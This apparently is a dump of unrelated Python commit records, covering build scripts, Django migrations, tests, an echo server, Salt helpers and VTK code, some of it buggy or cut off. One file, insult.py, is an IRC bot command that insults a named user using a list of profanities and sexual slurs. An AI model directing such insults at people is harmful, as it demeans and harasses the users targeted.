assert return_code == 0
# Both the .cpp and .h were generated in cppdir, but if hdir is different,
# the .h needs to move. Copy it instead of using os.rename for maximum
# portability in all cases.
if cppdir != hdir:
input_basename = os.path.basename(input)
(root, ext) = os.path.splitext(input_basename)
hname = 'V8%s.h' % root
hsrc = os.path.join(cppdir, hname)
hdst = os.path.join(hdir, hname)
shutil.copyfile(hsrc, hdst)
os.unlink(hsrc)
return return_code
if __name__ == '__main__':
sys.exit(main(sys.argv))
| #!/usr/bin/python
# Copyright (c) 2009 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# usage: rule_binding.py INPUT CPPDIR HDIR -- INPUTS -- OPTIONS
#
# INPUT is an IDL file, such as Whatever.idl.
#
# CPPDIR is the directory into which V8Whatever.cpp will be placed. HDIR is
# the directory into which V8Whatever.h will be placed.
#
# The first item in INPUTS is the path to generate-bindings.pl. Remaining
# items in INPUTS are used to build the Perl module include path.
#
# OPTIONS are passed as-is to generate-bindings.pl as additional arguments.
import errno
import os
import shlex
import shutil
import subprocess
import sys
def SplitArgsIntoSections(args):
sections = []
while len(args) > 0:
if not '--' in args:
# If there is no '--' left, everything remaining is an entire section.
dashes = len(args)
else:
dashes = args.index('--')
sections.append(args[:dashes])
# Next time through the loop, look at everything after this '--'.
if dashes + 1 == len(args):
# If the '--' is at the end of the list, we won't come back through the
# loop again. Add an empty section now corresponding to the nothingness
# following the final '--'.
args = []
sections.append(args)
else:
args = args[dashes + 1:]
return sections
def main(args):
sections = SplitArgsIntoSections(args[1:])
assert len(sections) == 3
(base, inputs, options) = sections
assert len(base) == 3
input = base[0]
cppdir = base[1]
hdir = base[2]
assert len(inputs) > 1
generate_bindings = inputs[0]
perl_modules = inputs[1:]
include_dirs = []
for perl_module in perl_modules:
include_dir = os.path.dirname(perl_module)
if not include_dir in include_dirs:
include_dirs.append(include_dir)
# The defines come in as one flat string. Split it up into distinct arguments.
if '--defines' in options:
defines_index = options.index('--defines')
if defines_index + 1 < len(options):
split_options = shlex.split(options[defines_index + 1])
if split_options:
options[defines_index + 1] = ' '.join(split_options)
# Build up the command.
command = ['perl', '-w']
for include_dir in include_dirs:
command.extend(['-I', include_dir])
command.append(generate_bindings)
command.extend(options)
command.extend(['--outputDir', cppdir, input])
# Do it. check_call is new in 2.5, so simulate its behavior with call and
# assert.
return_code = subprocess.call(command)
assert return_code == 0
# Both the .cpp and .h were generated in cppdir, but if hdir is different,
# the .h needs to move. Copy it instead of using os.rename for maximum
# portability in all cases.
if cppdir != hdir:
input_basename = os.path.basename(input)
(root, ext) = os.path.splitext(input_basename)
hname = 'V8%s.h' % root
hsrc = os.path.join(cppdir, hname)
hdst = os.path.join(hdir, hname)
shutil.copyfile(hsrc, hdst)
os.unlink(hsrc)
return return_code
if __name__ == '__main__':
sys.exit(main(sys.argv))
| Python | 0.999999 |
c48d852c2ceb39e6692be1b2c270aa75156e5b5e | Add migrations/0121_….py | ielex/lexicon/migrations/0121_copy_hindi_transliteration_to_urdu.py | ielex/lexicon/migrations/0121_copy_hindi_transliteration_to_urdu.py | # -*- coding: utf-8 -*-
# Inspired by:
# https://github.com/lingdb/CoBL/issues/223#issuecomment-256815113
from __future__ import unicode_literals, print_function
from django.db import migrations
def forwards_func(apps, schema_editor):
Language = apps.get_model("lexicon", "Language")
Meaning = apps.get_model("lexicon", "Meaning")
Lexeme = apps.get_model("lexicon", "Lexeme")
hindi = Language.objects.get(ascii_name='Hindi')
urdu = Language.objects.get(ascii_name='Urdu')
for meaning in Meaning.objects.all():
hLexemes = Lexeme.objects.filter(language=hindi, meaning=meaning).all()
uLexemes = Lexeme.objects.filter(language=urdu, meaning=meaning).all()
if len(hLexemes) != 1 or len(uLexemes) != 1:
continue
hLex = hLexemes[0]
uLex = uLexemes[0]
if uLex.transliteration == '' and hLex.transliteration != '':
uLex.transliteration = hLex.transliteration
uLex.save()
def reverse_func(apps, schema_editor):
print('Reverse of 0121_copy_hindi_transliteration_to_urdu does nothing.')
class Migration(migrations.Migration):
dependencies = [('lexicon', '306_0127_fix_issue_223')]
operations = [
migrations.RunPython(forwards_func, reverse_func),
]
| Python | 0 | |
da5bd8b1afcffd8a0509a785183ce1474fe7f53c | Create insult.py | insult.py | insult.py | """By Bowserinator: Insults people :D"""
from utils import add_cmd, add_handler
import utils
import random
name = "insult"
cmds = ["insult"]
insultPattern = [
"That [REPLACE] just cut me off!",
"My boss is a major [REPLACE]!",
"Don't tell her I said this, but that dude she's with is a real [REPLACE]!",
"Quit being such a [REPLACE]!",
"The only people who would vote for that guy are total [REPLACE]s!",
"What are you, some kind of [REPLACE]?",
"Dude's a real [REPLACE], you know what I mean?",
"He's got an ego like a [REPLACE]!",
"She was being a real [REPLACE] at the store today!",
"That [REPLACE] developer's code refuses to compile!",
"Her kids are total [REPLACE]s!",
"Whoever wrote this API documentation is a complete [REPLACE]!",
"That guy has the personality of a [REPLACE]!",
"I'm pretty sure I was a total [REPLACE] at the bar last night.",
"What kind of [REPLACE] buys pre-ground coffee?",
"I'd rather get a [REPLACE] to the eye than sit through this lecture.",
"Wow, that [REPLACE] just went off the deep end.",
"I may be a jerk, but at least I'm not like that [REPLACE] over there.",
"I need that like I need a [REPLACE] on my elbow.",
"What kind of [REPLACE] slows down to merge on the highway?",
"You've got a face like a [REPLACE].",
"Nothing personal, but you're a real [REPLACE].",
"What a bunch of [REPLACE]s.",
"That [REPLACE] is legally dead in 27 states - plus Guam.",
]
badwords = [
'Ass',
'Bitch',
'Butt',
'Cock',
'Cum',
'Cunt',
'Dick',
'Douche',
'Fart',
'Fuck',
'Jizz',
'Schlong',
'Shit',
'Slut',
'Snatch',
'Tit',
'Twat',
'Wang',
'Wank',
'Whore',
]
@add_cmd
def extract(irc, event, args):
send = "\x02" + args[0] +", \x0f" + random.choice(insultPattern).replace("[REPLACE]",random.choice(badwords).lower())
irc.reply(event, send)
add_handler(insult, name)
| Python | 0.001151 | |
1a1bf760f9d912f6c19943b58198d947b4e65b84 | Add mraa GPIO test | meta-iotqa/lib/oeqa/runtime/sanity/mraa_gpio.py | meta-iotqa/lib/oeqa/runtime/sanity/mraa_gpio.py | from oeqa.oetest import oeRuntimeTest
import unittest
import subprocess
from time import sleep
class MraaGpioTest(oeRuntimeTest):
'''
These tests require to use BeagleBone as testing host
'''
pin = ""
def setUp(self):
(status, output)= self.target.run("mraa-gpio version")
output = output.lower()
if any(x in output for x in ("broxton", "tuchuck", "joule")):
self.pin = "51"
elif "minnowboard" in output:
self.pin = "25"
else:
raise unittest.SkipTest(output)
def test_gpio(self):
'''
Test a GPIO pin on and off and check the pin output with
BeagleBone
'''
def check_gpio_output():
cmd = "cat /sys/class/gpio/gpio20/value".split()
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
return int(output)
self.target.run("mraa-gpio set " + self.pin + " 0")
sleep(1)
output = check_gpio_output()
self.assertEqual(output, 0, msg="GPIO pin output is not 0")
self.target.run("mraa-gpio set " + self.pin + " 1")
sleep(1)
output = check_gpio_output()
self.assertEqual(output, 1, msg="GPIO pin output is not 1")
self.target.run("mraa-gpio set " + self.pin + " 0")
sleep(1)
output = check_gpio_output()
self.assertEqual(output, 0, msg="GPIO pin output is not 0")
| Python | 0.000001 | |
8b7e84e98ccf0b44d7c6cc6ff23f462ec648d3f0 | add test | msmbuilder/tests/test_feature_selection.py | msmbuilder/tests/test_feature_selection.py | import numpy as np
from sklearn.feature_selection import VarianceThreshold as VarianceThresholdR
from ..featurizer import DihedralFeaturizer
from ..feature_selection import FeatureSelector, VarianceThreshold
from ..example_datasets import fetch_alanine_dipeptide as fetch_data
FEATS = [
('phi', DihedralFeaturizer(types=['phi'], sincos=True)),
('psi', DihedralFeaturizer(types=['psi'], sincos=True)),
]
def test_featureselector():
dataset = fetch_data()
trajectories = dataset["trajectories"]
fs = FeatureSelector(FEATS, which_feat='phi')
assert fs.which_feat == ['phi']
y1 = fs.partial_transform(trajectories[0])
y_ref1 = FEATS[0][1].partial_transform(trajectories[0])
np.testing.assert_array_almost_equal(y_ref1, y1)
def test_featureselector_transform():
dataset = fetch_data()
trajectories = dataset["trajectories"]
fs = FeatureSelector(FEATS, which_feat='psi')
y1 = fs.transform(trajectories)
assert len(y1) == len(trajectories)
def test_variancethreshold_vs_sklearn():
dataset = fetch_data()
trajectories = dataset["trajectories"]
fs = FeatureSelector(FEATS)
vt = VarianceThreshold(0.1)
vtr = VarianceThresholdR(0.1)
y = fs.partial_transform(trajectories[0])
z1 = vt.fit_transform([y])[0]
z_ref1 = vtr.fit_transform(y)
np.testing.assert_array_almost_equal(z_ref1, z1)
| import numpy as np
from sklearn.feature_selection import VarianceThreshold as VarianceThresholdR
from ..featurizer import DihedralFeaturizer
from ..feature_selection import FeatureSelector, VarianceThreshold
from ..example_datasets import fetch_alanine_dipeptide as fetch_data
FEATS = [
('phi', DihedralFeaturizer(types=['phi'], sincos=True)),
('psi', DihedralFeaturizer(types=['psi'], sincos=True)),
]
def test_featureselector():
dataset = fetch_data()
trajectories = dataset["trajectories"]
fs = FeatureSelector(FEATS, which_feat='phi')
assert fs.which_feat == ['phi']
y1 = fs.partial_transform(trajectories[0])
y_ref1 = FEATS[0][1].partial_transform(trajectories[0])
np.testing.assert_array_almost_equal(y_ref1, y1)
def test_variancethreshold_vs_sklearn():
dataset = fetch_data()
trajectories = dataset["trajectories"]
fs = FeatureSelector(FEATS)
vt = VarianceThreshold(0.1)
vtr = VarianceThresholdR(0.1)
y = fs.partial_transform(trajectories[0])
z1 = vt.fit_transform([y])[0]
z_ref1 = vtr.fit_transform(y)
np.testing.assert_array_almost_equal(z_ref1, z1)
| Python | 0.000002 |
e2b74a9978de4a6f15273e3e098379107eb0bec3 | Create 0001_0.py | pylyria/0001/0001_0.py | pylyria/0001/0001_0.py | # -*- coding: utf-8 -*-
#!/usr/bin/env python
#第 0001 题:做为 Apple Store App 独立开发者,你要搞限时促销,为你的应用生成激活码(或者优惠券),使用 Python 如何生成 200 个激活码(或者优惠券)?
import random
import string
def activation_code(id,length=16):
prefix = hex(int(id))[2:]+'V'
length = length - len(prefix)
chars=string.ascii_uppercase+string.digits
return prefix + ''.join([random.choice(chars) for i in range(length)])
def get_id(code):
return str(int(code.upper(), 16))
if __name__ == '__main__':
for i in range(10, 500, 23):
code = activation_code(i)
id_hex = code.split('L')[0]
id = get_id(id_hex)
print code,id
| Python | 0.019732 | |
82f9edd572d440941e7de67398b3fdeb52d5c389 | Add new migration | modelview/migrations/0047_auto_20191021_1525.py | modelview/migrations/0047_auto_20191021_1525.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.24 on 2019-10-21 13:25
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('modelview', '0046_auto_20191007_1630'),
]
operations = [
migrations.AlterField(
model_name='basicfactsheet',
name='license',
field=models.CharField(choices=[('Academic Free License v3.0', 'Academic Free License v3.0'), ('Apache license 2.0', 'Apache license 2.0'), ('Artistic license 2.0', 'Artistic license 2.0'), ('Boost Software License 1.0', 'Boost Software License 1.0'), ('BSD 2-clause "Simplified" license', 'BSD 2-clause "Simplified" license'), ('BSD 3-clause Clear license', 'BSD 3-clause Clear license'), ('Creative Commons license family', 'Creative Commons license family'), ('Creative Commons Zero v1.0 Universal', 'Creative Commons Zero v1.0 Universal'), ('Creative Commons Attribution 4.0', 'Creative Commons Attribution 4.0'), ('Creative Commons Attribution Share Alike 4.0', 'Creative Commons Attribution Share Alike 4.0'), ('Do What The F*ck You Want To Public License', 'Do What The F*ck You Want To Public License'), ('Educational Community License v2.0', 'Educational Community License v2.0'), ('Eclipse Public License 1.0', 'Eclipse Public License 1.0'), ('European Union Public License 1.1', 'European Union Public License 1.1'), ('GNU Affero General Public License v3.0', 'GNU Affero General Public License v3.0'), ('GNU General Public License family', 'GNU General Public License family'), ('GNU General Public License v2.0', 'GNU General Public License v2.0'), ('GNU General Public License v3.0', 'GNU General Public License v3.0'), ('GNU Lesser General Public License family', 'GNU Lesser General Public License family'), ('GNU Lesser General Public License v2.1', 'GNU Lesser General Public License v2.1'), ('GNU Lesser General Public License v3.0', 'GNU Lesser General Public License v3.0'), ('ISC', 'ISC'), ('LaTeX Project Public License v1.3c', 'LaTeX Project Public License v1.3c'), ('Microsoft Public License', 'Microsoft Public License'), ('MIT', 'MIT'), ('Mozilla Public License 2.0', 'Mozilla Public License 2.0'), ('Open Software License 3.0', 'Open Software License 3.0'), ('PostgreSQL License', 'PostgreSQL License'), ('SIL Open Font License 1.1', 'SIL Open Font License 1.1'), ('University of Illinois/NCSA Open Source License', 'University of Illinois/NCSA Open Source License'), ('The Unlicense', 'The Unlicense'), ('zLib License', 'zLib License'), ("BSD 3-clause 'New' or 'Revised' license", "BSD 3-clause 'New' or 'Revised' license"), ('Other', 'Other'), ('Unknown', 'Unknown')], default='Unknown', max_length=20, verbose_name='License'),
),
migrations.AlterField(
model_name='energyframework',
name='ci_FuelHandling',
field=models.BooleanField(default=False, verbose_name='Fuel handling'),
),
migrations.AlterField(
model_name='energyframework',
name='gs_single_project',
field=models.BooleanField(default=False, verbose_name='Single-project'),
),
migrations.AlterField(
model_name='energyframework',
name='inital_release_date',
field=models.DateField(help_text='When [mm-yyyy] was the framework initially released?', max_length=30, null=True, verbose_name='Inital Release Date'),
),
migrations.AlterField(
model_name='energyframework',
name='last_updated',
field=models.DateField(help_text='When was the factsheet last updated?', max_length=200, null=True, verbose_name='Last updated'),
),
]
| Python | 0 | |
45db21e2b4093cbda7976189327467ca3aebe1a3 | add instance serializer | api/v2/serializers/instance_serializer.py | api/v2/serializers/instance_serializer.py | from core.models import Instance
from rest_framework import serializers
from .identity_summary_serializer import IdentitySummarySerializer
from .user_serializer import UserSerializer
class InstanceSerializer(serializers.ModelSerializer):
identity = IdentitySummarySerializer(source='created_by_identity')
user = UserSerializer(source='created_by')
class Meta:
model = Instance
fields = ('id', 'name', 'ip_address', 'shell', 'vnc', 'start_date', 'end_date', 'identity', 'user')
| Python | 0.000001 | |
3fc5c2a4d3f13dc8062c93dd86fd94f06c35c91d | add an easy echo server by using python | network/echo-server/echo-iterative/main.py | network/echo-server/echo-iterative/main.py | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# Copyright (c) 2016 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list ofconditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materialsprovided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import socket
def handle(client_socket, client_address):
while True:
data = client_socket.recv(4096)
if data:
sent = client_socket.send(data)
else:
print 'disconnect', client_address
client_socket.close()
break
def main():
listen_address = ('0.0.0.0', 5555)
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(listen_address)
server_socket.listen(5)
while True:
(client_socket, client_address) = server_socket.accept()
print 'got connection from', client_address
handle(client_socket, client_address)
if __name__ == '__main__':
main()
| Python | 0.000002 | |
48d774b8bdcaa924303b905cef27b4eb13f08fd6 | Add pillar_roots to the wheel system | salt/wheel/pillar_roots.py | salt/wheel/pillar_roots.py | '''
The `pillar_roots` wheel module is used to manage files under the pillar roots
directories on the master server.
'''
# Import python libs
import os
# Import salt libs
import salt.utils
def find(path, env='base'):
'''
Return a dict of the files located with the given path and environment
'''
# Return a list of paths + text or bin
ret = []
if env not in __opts__['pillar_roots']:
return ret
for root in __opts__['pillar_roots'][env]:
full = os.path.join(root, path)
if os.path.isfile(full):
# Add it to the dict
with open(full, 'rb') as fp_:
if salt.utils.istextfile(fp_):
ret.append({full: 'txt'})
else:
ret.append({full: 'bin'})
return ret
def list_env(env='base'):
'''
Return all of the file paths found in an environment
'''
ret = {}
if not env in __opts__['pillar_roots']:
return ret
for f_root in __opts__['pillar_roots'][env]:
ret[f_root] = {}
for root, dirs, files in os.walk(f_root):
sub = ret[f_root]
if root != f_root:
# grab subroot ref
sroot = root
above = []
# Populate the above dict
while not os.path.samefile(sroot, f_root):
base = os.path.basename(sroot)
if base:
above.insert(0, base)
sroot = os.path.dirname(sroot)
for aroot in above:
sub = sub[aroot]
for dir_ in dirs:
sub[dir_] = {}
for fn_ in files:
sub[fn_] = 'f'
return ret
def list_roots():
'''
Return all of the files names in all available environments
'''
ret = {}
for env in __opts__['pillar_roots']:
ret[env] = []
ret[env].append(list_env(env))
return ret
def read(path, env='base'):
'''
Read the contents of a text file, if the file is binary then
'''
# Return a dict of paths + content
ret = []
files = find(path, env)
for fn_ in files:
full = fn_.keys()[0]
form = fn_[full]
if form == 'txt':
with open(full, 'rb') as fp_:
ret.append({full: fp_.read()})
return ret
def write(data, path, env='base', index=0):
'''
Write the named file, by default the first file found is written, but the
index of the file can be specified to write to a lower priority file root
'''
if not env in __opts__['pillar_roots']:
return 'Named environment {0} is not present'.format(env)
if not len(__opts__['pillar_roots'][env]) > index:
return 'Specified index {0} in environment {1} is not present'.format(
index, env)
if os.path.isabs(path):
return ('The path passed in {0} is not relative to the environment '
'{1}').format(path, env)
dest = os.path.join(__opts__['pillar_roots'][env][index], path)
dest_dir = os.path.dirname(dest)
if not os.path.isdir(dest_dir):
os.makedirs(dest_dir)
with open(dest, 'w+') as fp_:
fp_.write(data)
return 'Wrote data to file {0}'.format(dest)
| Python | 0.000001 | |
07fd61306e645b7240883d5d468f94be5ce8a34c | Add a command to retrieve all triggers | Commands/Triggers.py | Commands/Triggers.py | from IRCResponse import IRCResponse, ResponseType
from CommandInterface import CommandInterface
import GlobalVars
class Command(CommandInterface):
triggers = ["triggers"]
help = "triggers -- returns a list of all command triggers, must be over PM"
def execute(self, Hubbot, message):
if message.User.Name != message.ReplyTo:
return IRCResponse(ResponseType.Say, "{} must be used over PM!".format(message.Command), message.ReplyTo)
else:
response = ""
for name, command in GlobalVars.commands.iteritems():
if len(command.triggers)>0:
for trigger in command.triggers:
if "<" not in trigger and trigger not in response:
response += "{}, ".format(trigger)
return IRCResponse(ResponseType.Say, response, message.ReplyTo) | Python | 0.000002 | |
b173aa1a6dc1c361d65150c6782db7618a5ff126 | Add simple indexing test. | benchmarks/simpleindex.py | benchmarks/simpleindex.py | import timeit
# This is to show that NumPy is a poorer choice than nested Python lists
# if you are writing nested for loops.
# This is slower than Numeric was but Numeric was slower than Python lists were
# in the first place.
N = 30
code2 = r"""
for k in xrange(%d):
for l in xrange(%d):
res = a[k,l].item() + a[l,k].item()
""" % (N,N)
code3 = r"""
for k in xrange(%d):
for l in xrange(%d):
res = a[k][l] + a[l][k]
""" % (N,N)
code = r"""
for k in xrange(%d):
for l in xrange(%d):
res = a[k,l] + a[l,k]
""" % (N,N)
setup3 = r"""
import random
a = [[None for k in xrange(%d)] for l in xrange(%d)]
for k in xrange(%d):
for l in xrange(%d):
a[k][l] = random.random()
""" % (N,N,N,N)
t1 = timeit.Timer(code, 'import numpy as N; a = N.rand(%d,%d)' % (N,N))
t2 = timeit.Timer(code, 'import MLab as N; a=N.rand(%d,%d)' % (N,N))
t3 = timeit.Timer(code, 'import numarray.mlab as N; a=N.rand(%d,%d)' % (N,N))
t4 = timeit.Timer(code2, 'import numpy as N; a = N.rand(%d,%d)' % (N,N))
t5 = timeit.Timer(code3, setup3)
t6 = timeit.Timer("res = a + a.transpose()","import numpy as N; a=N.rand(%d,%d)" % (N,N))
print "shape = ", (N,N)
print "NumPy 1: ", t1.repeat(3,100)
print "NumPy 2: ", t4.repeat(3,100)
print "Numeric: ", t2.repeat(3,100)
print "Numarray: ", t3.repeat(3,100)
print "Python: ", t5.repeat(3,100)
print "Optimized: ", t6.repeat(3,100)
| Python | 0 | |
99061bec96a7337e6ddc1d698f00805f84089b3b | Set content headers on download | bepasty/views/download.py | bepasty/views/download.py | # Copyright: 2013 Bastian Blank <bastian@waldi.eu.org>
# License: BSD 2-clause, see LICENSE for details.
from flask import Response, current_app, stream_with_context
from flask.views import MethodView
from ..utils.name import ItemName
from . import blueprint
class DownloadView(MethodView):
def get(self, name):
n = ItemName.parse(name)
item = current_app.storage.open(n)
def stream():
try:
# Stream content from storage
offset = 0
size = item.data.size
while offset < size:
buf = item.data.read(16*1024, offset)
offset += len(buf)
yield buf
finally:
item.close()
ret = Response(stream_with_context(stream()))
ret.headers['Content-Disposition'] = 'attachment; filename="{}"'.format(item.meta['filename'])
ret.headers['Content-Length'] = item.meta['size']
return ret
blueprint.add_url_rule('/<name>/+download', view_func=DownloadView.as_view('download'))
| # Copyright: 2013 Bastian Blank <bastian@waldi.eu.org>
# License: BSD 2-clause, see LICENSE for details.
from flask import Response, current_app, stream_with_context
from flask.views import MethodView
from ..utils.name import ItemName
from . import blueprint
class DownloadView(MethodView):
def get(self, name):
n = ItemName.parse(name)
item = current_app.storage.open(n)
def stream():
try:
# Stream content from storage
offset = 0
size = item.data.size
while offset < size:
buf = item.data.read(16*1024, offset)
offset += len(buf)
yield buf
finally:
item.close()
return Response(stream_with_context(stream()))
blueprint.add_url_rule('/<name>/+download', view_func=DownloadView.as_view('download'))
| Python | 0 |
5787d3ff813d2c96d0ec2c2fd90f91b93315e564 | Add stub for cliches | proselint/checks/inprogress/wgd_cliches.py | proselint/checks/inprogress/wgd_cliches.py | """WGD101: Cliches.
---
layout: post
error_code: WGD101
source: write-good
source_url: https://github.com/btford/write-good
title: WGD101: Cliches
date: 2014-06-10 12:31:19
categories: writing
---
Cliches are cliche.
"""
def check(text):
error_code = "WGD101"
msg = "Cliche."
return [(1, 1, error_code, msg)]
| Python | 0.000001 | |
9068fd506811113c50886bf9c8f4094b7e1bd7a3 | Add stats.py from week 2. | hw3/stats.py | hw3/stats.py | #!/usr/bin/python
# Week 2 Problem 3. Simple statistics.
# Use Python 3 print() function, Python 3 integer division
from __future__ import print_function, division
def get_stats(input_list):
'''
Accepts a list of integers, and returns a tuple of four numbers:
minimum(int), maximum(int), mean(float), and median(float)
>>> get_stats([0, 1, 2, 3, 4])
(0, 4, 2.0, 2.0)
>>> get_stats([0, 1, 2, 3, 4, 5])
(0, 5, 2.5, 2.5)
>>> get_stats([0, 1, 2, 5])
(0, 5, 2.0, 1.5)
>>> get_stats([0, 1, 2, 4, 5])
(0, 5, 2.4, 2.0)
'''
# min() and max() are in the standard library
# you could also write
# minimum = sorted(input_list)[0]
# maximum = sorted(input_list)[-1]
minimum = min(input_list)
maximum = max(input_list)
# use the sum() function from the standard library to calculate mean
# this is equivalent to
# total = length = 0
# for i in input_list: total += i
# for i in input_list: length += 1
# mean = total / length
mean = sum(input_list) / len(input_list)
# calculate the median
# if the number of elements is even, we take the average of 2 middle numbers
# if the number of elements is odd, median is the middle element
# note that we used the Python 3 integer division // to get integer
if len(input_list) % 2:
median = input_list[(len(input_list) - 1) // 2 ]
else:
median = 0.5 * (input_list[(len(input_list) - 1) // 2] \
+ input_list[len(input_list) // 2])
# return a tuple of min, max, mean, median
return minimum, maximum, mean, median
if __name__ == '__main__':
# we will test our function with a list of integers from 0 to 50
my_list = range(0, 51)
# get_stats returns a tuple of min, max, mean, median of my_list
# print out min, max, mean, median on each line
print("Minimum: %i\nMaximum: %i\nMean: %.1f\nMedian: %.1f" % get_stats(my_list)) | Python | 0 | |
84f31dfa718a2f557b0058920037265331fd1a3f | Add missing merge migration | osf/migrations/0099_merge_20180427_1109.py | osf/migrations/0099_merge_20180427_1109.py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2018-04-27 16:09
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('osf', '0098_merge_20180416_1807'),
('osf', '0098_auto_20180418_1722'),
]
operations = [
]
| Python | 0.000002 | |
99d7a6dd79e0661bb047198261d624fd62e41406 | add missing file | gui/vtk/ExodusResult.py | gui/vtk/ExodusResult.py | import os, sys, PyQt4, getopt
from PyQt4 import QtCore, QtGui
import vtk
import time
class ExodusResult:
def __init__(self, render_widget, renderer, plane):
self.render_widget = render_widget
self.renderer = renderer
self.plane = plane
self.current_actors = []
def setFileName(self, file_name):
self.currently_has_actor = True
self.file_name = file_name
self.reader = vtk.vtkExodusIIReader()
self.reader.SetFileName(self.file_name)
self.reader.UpdateInformation()
self.current_dim = self.reader.GetDimensionality()
self.min_timestep = 0
self.max_timestep = 0
range = self.reader.GetTimeStepRange()
self.min_timestep = range[0]
self.max_timestep = range[1]
self.reader.SetAllArrayStatus(vtk.vtkExodusIIReader.ELEM_BLOCK, 1)
self.reader.SetAllArrayStatus(vtk.vtkExodusIIReader.NODAL, 1)
self.reader.SetAllArrayStatus(vtk.vtkExodusIIReader.NODAL_TEMPORAL, 1)
self.reader.SetTimeStep(self.max_timestep)
self.reader.Update()
self.current_variable_point_data = {}
self.current_variables = []
self.current_nodal_components = {}
self.current_elemental_components = {}
self.component_index = -1
cdp = vtk.vtkCompositeDataPipeline()
vtk.vtkAlgorithm.SetDefaultExecutivePrototype(cdp)
self.output = self.reader.GetOutput()
self.geom = vtk.vtkCompositeDataGeometryFilter()
self.geom.SetInputConnection(0,self.reader.GetOutputPort(0))
self.geom.Update()
self.lut = vtk.vtkLookupTable()
self.lut.SetHueRange(0.667, 0.0)
self.lut.SetNumberOfColors(256)
self.lut.Build()
self.data = self.geom.GetOutput()
num_nodal_variables = self.data.GetPointData().GetNumberOfArrays()
for var_num in xrange(num_nodal_variables):
var_name = self.data.GetPointData().GetArrayName(var_num)
self.current_variables.append(var_name)
components = self.data.GetPointData().GetVectors(var_name).GetNumberOfComponents()
self.current_nodal_components[var_name] = components
# self.data.GetPointData().GetVectors(value_string).GetComponentName(0)
num_elemental_variables = self.data.GetCellData().GetNumberOfArrays()
for var_num in xrange(num_elemental_variables):
var_name = self.data.GetCellData().GetArrayName(var_num)
self.current_variables.append(var_name)
components = self.data.GetCellData().GetVectors(var_name).GetNumberOfComponents()
self.current_elemental_components[var_name] = components
self.mapper = vtk.vtkPolyDataMapper()
self.mapper.SetInput(self.data)
self.mapper.ScalarVisibilityOn()
self.mapper.SetLookupTable(self.lut)
self.actor = vtk.vtkActor()
self.current_actors.append(self.actor)
self.actor.SetMapper(self.mapper)
self.renderer.AddActor(self.actor)
self.current_actor = self.actor
self.clipper = vtk.vtkTableBasedClipDataSet()
self.clipper.SetInput(self.output)
self.clipper.SetClipFunction(self.plane)
self.clipper.Update()
self.clip_geom = vtk.vtkCompositeDataGeometryFilter()
self.clip_geom.SetInputConnection(0,self.clipper.GetOutputPort(0))
self.clip_geom.Update()
self.clip_data = self.clip_geom.GetOutput()
self.clip_mapper = vtk.vtkPolyDataMapper()
self.clip_mapper.SetInput(self.clip_data)
self.clip_mapper.ScalarVisibilityOn()
self.clip_mapper.SetLookupTable(self.lut)
self.clip_actor = vtk.vtkActor()
self.clip_actor.SetMapper(self.clip_mapper)
self.current_actors.append(self.clip_actor)
self.scalar_bar = vtk.vtkScalarBarActor()
self.current_actors.append(self.scalar_bar)
self.scalar_bar.SetLookupTable(self.mapper.GetLookupTable())
self.scalar_bar.SetNumberOfLabels(4)
self.current_bounds = self.actor.GetBounds()
| Python | 0.000001 | |
d6850ebe441a966dcf17f5cb8b0ce57a7c9dce8a | Add argument parsing | helenae/db/create_db.py | helenae/db/create_db.py | from optparse import OptionParser
import sqlalchemy.exc
from sqlalchemy import text
from sqlalchemy.orm import sessionmaker
from tables import *
def create_db():
"""
Defined tables at tables.py file are created in some DB
"""
try:
Base.metadata.create_all(engine)
except sqlalchemy.exc.InvalidRequestError:
print "SQLAlchemy ERROR: SQLAlchemy was asked to do something it can't do"
except sqlalchemy.exc.DBAPIError, exc:
print "SQLAlchemy ERROR: %s", (exc)
except sqlalchemy.exc.SQLAlchemyError, exc:
print "SQLAlchemy ERROR: %s", (exc)
def initialize_db():
"""
This code inserting testing data into defined tables
"""
#insert test data
Session = sessionmaker(bind=engine)
session = Session()
test_dir = Catalog('test')
session.add(test_dir)
session.commit()
#test_file = File('test.txt', '123456.txt', hash('123456.txt'), 1024, 0, 1)
#test_file.server_id.append(test_server)
#session.add(test_file)
#session.commit()
test_fs = FileSpace('test')
session.add(test_fs)
session.commit()
test_acctype = AccountType('free', 0.00)
session.add(test_acctype)
session.commit()
test_group = Group('users', 1101)
session.add(test_group)
session.commit()
test_user = Users('relrin', 'Valery Savich', hash('123456'), 'some@mail.com', '01.01.2014', 1, 1, 1)
session.add(test_user)
session.commit()
session.close()
print "Insertion data has complete!"
print "Test query: Getting data from [Users] table\n"
connection = engine.connect()
result = engine.execute(text("select name, fullname, password from users"))
for row in result:
